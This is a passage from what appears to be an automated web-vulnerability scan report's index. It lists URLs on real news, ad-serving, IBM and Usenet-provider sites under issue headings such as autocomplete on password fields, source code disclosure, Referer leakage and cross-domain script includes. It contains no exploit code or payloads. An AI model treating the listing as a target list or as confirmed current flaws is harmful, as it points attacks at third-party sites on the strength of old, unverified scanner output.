12.188. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.189. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.190. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.191. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.192. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.193. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.194. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.195. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.196. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.197. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.198. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.199. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.200. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.201. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.212. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.213. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.214. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.215. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.216. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.217. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf
12.218. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782
12.219. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right
12.220. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right-2
12.221. http://tag.admeld.com/ad/js/221/tmz/300x250/bf-top-right
12.222. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf
12.223. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf_2
12.224. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr
12.225. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr_2
12.226. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_inpost
12.227. http://tag.admeld.com/ad/js/221/tmz/300x250/ros_inpage
12.228. http://tag.admeld.com/ad/js/221/tmz/300x250/toofab_ros
12.229. http://tag.admeld.com/ad/js/221/tmz/728x90/homepage_atf
12.230. http://tag.admeld.com/ad/js/221/tmz/728x90/ros
12.231. http://tag.admeld.com/ad/js/221/tmz/728x90/toofab_ros
12.232. http://tag.admeld.com/ad/js/610/unified/300x250/bh_656864_29757991
12.233. http://tag.admeld.com/match
12.234. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
12.235. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html
12.236. http://tag.admeld.com/passback/js/221/tmz/300x250/28/meld.js
12.237. http://tag.admeld.com/passback/js/221/tmz/300x250/49/meld.js
12.238. http://tag.admeld.com/passback/js/221/tmz/728x90/28/meld.js
12.239. http://tag.admeld.com/passback/js/221/tmz/728x90/49/meld.js
12.240. http://tag.admeld.com/passback/js/610/unified/300x250/8/meld.js
12.241. http://tag.contextweb.com/TagPublish/GetAd.aspx
12.242. http://tag.contextweb.com/TagPublish/GetAd.aspx
12.243. http://tenzing.fmpub.net/
12.244. http://testdm.travelers.com/trvwics.gif
12.245. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif
12.246. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif
12.247. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif
12.248. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif
12.249. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif
12.250. http://traffic.outbrain.com/network/redir
12.251. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==
12.252. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99
12.253. http://usadmm.dotomi.com/dmm/servlet/dmm
12.254. http://usenetjunction.com/scripts/track.php
12.255. http://vads.adbrite.com/vast/adserver
12.256. http://vlog.leadforce1.com/bf/bf.php
12.257. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif
12.258. http://www.att.com/u-verse/availability/
12.259. http://www.bradsdeals.com/dealsoftheday/subscribe/b
12.260. http://www.elfqrin.com/hacklab/pages/nntpserv.php
12.261. http://www.enstarllc.com/
12.262. http://www.giganews.com/
12.263. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact
12.264. http://www.google.com/sorry/
12.265. http://www.google.com/sorry/Captcha
12.266. http://www.googleadservices.com/pagead/aclk
12.267. http://www.ibm.com/search/csass/search
12.268. http://www.ibm.com/search/csass/search/
12.269. http://www.mailtraq.com/30day
12.270. http://www.nntpserver.com/gl/
12.271. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp
13. Password field with autocomplete enabled
13.1. http://dw1.s81c.com/common/js/dynamicnav.js
13.2. http://forums.cpanel.net/calendar.php
13.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
13.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
13.5. http://jcp.org/en/jsr/all
13.6. http://www.actvalue.com/
13.7. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
13.8. http://www.easynews.com/
13.9. http://www.easynews.com/whyeasynews.html
13.10. https://www.easynews.com/signup/
13.11. http://www.giganews.com/
13.12. https://www.giganews.com/signup/
13.13. https://www.giganews.com/signup/billing.html
13.14. http://www.ibm.com/common/js/dynamicnav.js
13.15. http://www.ibm.com/developerworks/java/
13.16. http://www.ibm.com/developerworks/java/find/standards/
13.17. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
13.18. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
13.19. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
13.20. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
13.21. http://www.ibm.com/search/csass/search/
13.22. http://www.jcp.org/en/home/index
13.23. http://www.jcp.org/en/jsr/detail
13.24. https://www.mailjet.com/signup
13.25. http://www.ted.com/js/library.min.js
13.26. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
13.27. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
13.28. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
13.29. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
13.30. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
13.31. http://www.tmz.com/signin/
13.32. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
13.33. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
13.34. http://www.usenetbinaries.com/l/newsgroups.html
13.35. http://www.usenetserver.com/en/support.php
14. Source code disclosure
14.1. http://info.mailtraq.com/v/js/ncBwHlpr.js
14.2. http://resources.infolinks.com/js/221.3.5b/infolinks.js
14.3. http://resources.infolinks.com/js/222.0.4/infolinks.js
14.4. http://www.enstarllc.com/v/js/ncBwHlpr.js
14.5. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css
14.6. http://www.mailtraq.com/v/js/ncBwHlpr.js
14.7. http://www.ted.com/js/library.min.js
15. Referer-dependent response
15.1. http://adnxs.revsci.net/imp
15.2. http://c.brightcove.com/services/viewer/federated_f9
15.3. http://cpanel.app9.hubspot.com/Inactive.aspx
15.4. http://dg.specificclick.net/
15.5. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
15.6. http://pixel.adsafeprotected.com/jspix
15.7. http://weather.yahoo.com/badge/
15.8. http://www.facebook.com/plugins/activity.php
15.9. http://www.facebook.com/plugins/like.php
15.10. http://www.facebook.com/plugins/likebox.php
15.11. http://www.mailtraq.com/30day
15.12. http://www.westhost.com/images/bluegradbg.gif
15.13. http://www.westhost.com/images/boxtopbackground.gif
16. Cross-domain POST
17. Cross-domain Referer leakage
17.1. http://3ps.go.com/DynamicAd
17.2. http://a.collective-media.net/cmadj/cm.rev_bostonherald/
17.3. http://abc.csar.go.com/DynamicCSAd
17.4. http://abc.csar.go.com/DynamicCSAd
17.5. https://accounts.usenetserver.com/register/index.php
17.6. http://ad.afy11.net/ad
17.7. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9
17.8. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106
17.9. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10
17.10. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3
17.11. http://ad.doubleclick.net/adj/cm.rev_bostonherald/
17.12. http://ad.doubleclick.net/adj/tconf.ted/homepage
17.13. http://ad.doubleclick.net/adj/tmz.category.wb.dart/black_swan
17.14. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups
17.15. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice
17.16. http://ad.doubleclick.net/adj/tmz.category.wb.dart/dwts
17.17. http://ad.doubleclick.net/adj/tmz.ros.wb.dart/
17.18. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/
17.19. http://ad.turn.com/server/ads.js
17.20. https://admin.usenetbinaries.com/cgi-bin/signup
17.21. http://ads.adsonar.com/adserving/getAds.jsp
17.22. http://ads.bluelithium.com/st
17.23. http://ads.dotomi.com/ads_smokey_pure.php
17.24. http://ads.tw.adsonar.com/adserving/getAds.jsp
17.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js
17.26. http://afe.specificclick.net/
17.27. http://afe.specificclick.net/
17.28. http://afe.specificclick.net/
17.29. http://as.casalemedia.com/j
17.30. http://as.casalemedia.com/j
17.31. http://as.casalemedia.com/j
17.32. http://as1.suitesmart.com/99917/G15493.js
17.33. http://attuverseoffers.com/tv_hsi_bundles/includes/xml/offersS20.xml
17.34. http://attuverseoffers.com/tv_hsi_bundles/index.php
17.35. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3
17.36. http://bh.heraldinteractive.com/includes/processAds.bg
17.37. http://bh.heraldinteractive.com/includes/processAds.bg
17.38. http://bh.heraldinteractive.com/includes/processAds.bg
17.39. http://bostonherald.com/news/columnists/view.bg
17.40. http://bostonherald.com/news/national/
17.41. http://bostonherald.com/news/regional/view.bg
17.42. http://bostonherald.com/news/regional/view.bg
17.43. http://bostonherald.com/projects/your_tax_dollars.bg
17.44. http://bostonherald.com/track/inside_track/view.bg
17.45. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
17.46. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
17.47. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
17.48. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx
17.49. http://bp.specificclick.net/
17.50. http://ca.rtb.prod2.invitemedia.com/build_creative
17.51. http://ca.rtb.prod2.invitemedia.com/build_creative
17.52. http://ca.rtb.prod2.invitemedia.com/build_creative
17.53. http://ca.rtb.prod2.invitemedia.com/build_creative
17.54. http://ca.rtb.prod2.invitemedia.com/build_creative
17.55. http://ca.rtb.prod2.invitemedia.com/build_creative
17.56. http://cache2-scripts.pressdisplay.com/res/WebResource.ashx
17.57. http://cdn.polls.tmz.com/polls/34613/iframe
17.58. http://cdn.polls.tmz.com/polls/34614/iframe
17.59. http://choices.truste.com/ca
17.60. http://choices.truste.com/ca
17.61. http://cim.meebo.com/cim
17.62. http://cm.g.doubleclick.net/pixel
17.63. http://cm.g.doubleclick.net/pixel
17.64. http://cm.g.doubleclick.net/pixel
17.65. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html
17.66. http://dg.specificclick.net/
17.67. http://duckduckgo.com/
17.68. http://googleads.g.doubleclick.net/pagead/ads
17.69. http://googleads.g.doubleclick.net/pagead/ads
17.70. http://googleads.g.doubleclick.net/pagead/ads
17.71. http://googleads.g.doubleclick.net/pagead/ads
17.72. http://googleads.g.doubleclick.net/pagead/ads
17.73. http://googleads.g.doubleclick.net/pagead/ads
17.74. http://googleads.g.doubleclick.net/pagead/ads
17.75. http://googleads.g.doubleclick.net/pagead/ads
17.76. http://googleads.g.doubleclick.net/pagead/ads
17.77. http://googleads.g.doubleclick.net/pagead/ads
17.78. http://googleads.g.doubleclick.net/pagead/ads
17.79. http://googleads.g.doubleclick.net/pagead/ads
17.80. http://googleads.g.doubleclick.net/pagead/ads
17.81. http://googleads.g.doubleclick.net/pagead/ads
17.82. http://googleads.g.doubleclick.net/pagead/ads
17.83. http://googleads.g.doubleclick.net/pagead/ads
17.84. http://googleads.g.doubleclick.net/pagead/ads
17.85. http://googleads.g.doubleclick.net/pagead/ads
17.86. http://googleads.g.doubleclick.net/pagead/ads
17.87. http://googleads.g.doubleclick.net/pagead/ads
17.88. http://googleads.g.doubleclick.net/pagead/ads
17.89. http://googleads.g.doubleclick.net/pagead/ads
17.90. http://googleads.g.doubleclick.net/pagead/ads
17.91. http://googleads.g.doubleclick.net/pagead/ads
17.92. http://googleads.g.doubleclick.net/pagead/ads
17.93. http://googleads.g.doubleclick.net/pagead/ads
17.94. http://googleads.g.doubleclick.net/pagead/ads
17.95. http://googleads.g.doubleclick.net/pagead/ads
17.96. http://googleads.g.doubleclick.net/pagead/ads
17.97. http://ib.adnxs.com/ptj
17.98. http://images.search.yahoo.com/search/images
17.99. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html
17.100. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php
17.101. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853
17.102. http://omg.yahoo.com/search
17.103. http://omg.yahoo.com/xhr/ad/LREC/2115806991
17.104. http://omg.yahoo.com/xhr/ad/LREC/2115806991
17.105. http://omg.yahoo.com/xhr/ad/LREC/2115823648
17.106. http://omg.yahoo.com/xhr/ad/MREC/2115823648
17.107. http://omg.yahoo.com/xhr/relatedsearch/
17.108. http://pagead2.googlesyndication.com/pagead/ads
17.109. http://pagead2.googlesyndication.com/pagead/ads
17.110. http://pagead2.googlesyndication.com/pagead/ads
17.111. http://pagead2.googlesyndication.com/pagead/ads
17.112. http://pagead2.googlesyndication.com/pagead/ads
17.113. http://pro.tweetmeme.com/button.js
17.114. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
17.115. http://search.yahoo.com/search
17.116. http://secure-us.imrworldwide.com/ocr/e
17.117. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.118. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.119. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.120. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.121. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.132. http://us.adserver.yahoo.com/a
17.133. http://weather.yahoo.com/badge/
17.134. http://www-01.ibm.com/support/docview.wss
17.135. http://www-03.ibm.com/innovation/us/watson/images/arrows/arrows.png
17.136. http://www-142.ibm.com/software/products/us/en/search
17.137. http://www-304.ibm.com/support/operations/us/en/invoicespayments
17.138. http://www-304.ibm.com/support/operations/us/en/orderdelivery
17.139. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html
17.140. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
17.141. http://www.att.com/media/gvp/gvpUtils.js
17.142. http://www.bostonherald.com/mobile/view.bg
17.143. http://www.bradsdeals.com/dealsoftheday/subscribe/b
17.144. http://www.easynews.com/
17.145. http://www.facebook.com/plugins/activity.php
17.146. http://www.facebook.com/plugins/facepile.php
17.147. http://www.facebook.com/plugins/likebox.php
17.148. http://www.giganews.com/
17.149. https://www.giganews.com/signup/billing.html
17.150. http://www.google.com/search
17.151. http://www.google.com/search
17.152. http://www.ibm.com/Search/
17.153. http://www.ibm.com/developerworks/forums/thread.jspa
17.154. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp
17.155. http://www.ibm.com/search/csass/search
17.156. http://www.ibm.com/search/csass/search/
17.157. http://www.itoncommand.com/GetAQuote.aspx
17.158. http://www.jcp.org/en/jsr/detail
17.159. http://www.matrix42.com/downloads/wp-vdi-demystified/
17.160. http://www.mokafive.com/BetterWayVDI
17.161. http://www.redbooks.ibm.com/cgi-bin/searchsite.cgi
17.162. http://www.ted.com/js/library.min.js
17.163. http://www.ted.com/search
17.164. http://www.thundernews.com/
17.165. https://www.thundernews.com/billinginfo.php
17.166. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
17.167. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
17.168. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
17.169. http://www.usenetbinaries.com/l/newsgroups.html
18. Cross-domain script include
18.1. http://3ps.go.com/DynamicAd
18.2. http://abc.csar.go.com/DynamicCSAd
18.3. https://accounts.usenetserver.com/register/index.php
18.4. http://ad.afy11.net/ad
18.5. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9
18.6. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106
18.7. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10
18.8. https://admin.usenetbinaries.com/cgi-bin/signup
18.9. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
18.10. http://afe.specificclick.net/
18.11. http://attuverseoffers.com/tv_hsi_bundles/index.php
18.12. http://beta.abc.go.com/shows/charlies-angels
18.13. http://beta.abc.go.com/shows/charlies-angels/bios
18.14. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
18.15. http://bgs-soft.com/Products_Sgagent.asp
18.16. http://bgs-soft.com/UsAndThem.asp
18.17. http://bh.heraldinteractive.com/includes/processAds.bg
18.18. http://bh.heraldinteractive.com/includes/processAds.bg
18.19. http://bh.heraldinteractive.com/includes/processAds.bg
18.20. http://blekko.com/
18.21. http://blekko.com/ws/radius+server
18.22. http://blog.ted.com/
18.23. http://bostonherald.com/entertainment/
18.24. http://bostonherald.com/news/
18.25. http://bostonherald.com/news/columnists/view.bg
18.26. http://bostonherald.com/news/national/
18.27. http://bostonherald.com/news/regional/view.bg
18.28. http://bostonherald.com/projects/your_tax_dollars.bg
18.29. http://bostonherald.com/track/
18.30. http://bostonherald.com/track/inside_track/view.bg
18.31. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
18.32. http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also
18.33. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx
18.34. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
18.35. http://cdn.optmd.com/V2/80181/197812/index.html
18.36. http://cdn.polls.tmz.com/polls/34613/iframe
18.37. http://cdn.polls.tmz.com/polls/34614/iframe
18.38. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html
18.39. http://d14.zedo.com//ads3/k/951/887163/3853/1000007/i.js
18.40. http://forums.cpanel.net/calendar.php
18.41. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
18.42. http://freeradius.org/
18.43. http://gallery.pictopia.com/bostonherald/
18.44. http://googleads.g.doubleclick.net/pagead/ads
18.45. http://googleads.g.doubleclick.net/pagead/ads
18.46. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html
18.47. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html
18.48. http://info.mailtraq.com/imap
18.49. http://info.mailtraq.com/wac
18.50. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php
18.51. http://members.westhost.com/v2/AddFavorites.js
18.52. http://members.westhost.com/v2/images/Icon-Install.gif
18.53. http://members.westhost.com/v2/images/bgmembers.gif
18.54. http://members.westhost.com/v2/images/diagram_imap.gif
18.55. http://members.westhost.com/v2/images/diagram_pop3.gif
18.56. http://members.westhost.com/v2/images/dotted_underline.gif
18.57. http://members.westhost.com/v2/images/hi_imap.gif
18.58. http://members.westhost.com/v2/images/larrow.gif
18.59. http://members.westhost.com/v2/images/printpage.gif
18.60. http://members.westhost.com/v2/images/v1_checkbox.gif
18.61. http://members.westhost.com/v2/menu_settings_members.js
18.62. http://members.westhost.com/v2/menu_styles.css
18.63. http://members.westhost.com/v2/scripts/cbrowser_dom.js
18.64. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/300x250/jx/ss/a/1290982822@x15
18.65. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/728x90/jx/ss/a/1708544459@Top1
18.66. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Bottom
18.67. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Top
18.68. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Bottom
18.69. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Middle1
18.70. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Top
18.71. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1321816395@x12
18.72. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1359771821@x12
18.73. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1779944804@x11
18.74. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1969994821@x11
18.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle
18.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1
18.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Right
18.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top
18.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom
18.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
18.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
18.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
18.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
18.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
18.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
18.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Bottom
18.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1
18.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top
18.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Bottom
18.90. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle
18.91. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle1
18.92. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Top
18.93. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle
18.94. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Right
18.95. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top
18.96. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle
18.97. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom
18.98. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
18.99. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
18.100. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
18.101. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
18.102. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top
18.103. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Bottom
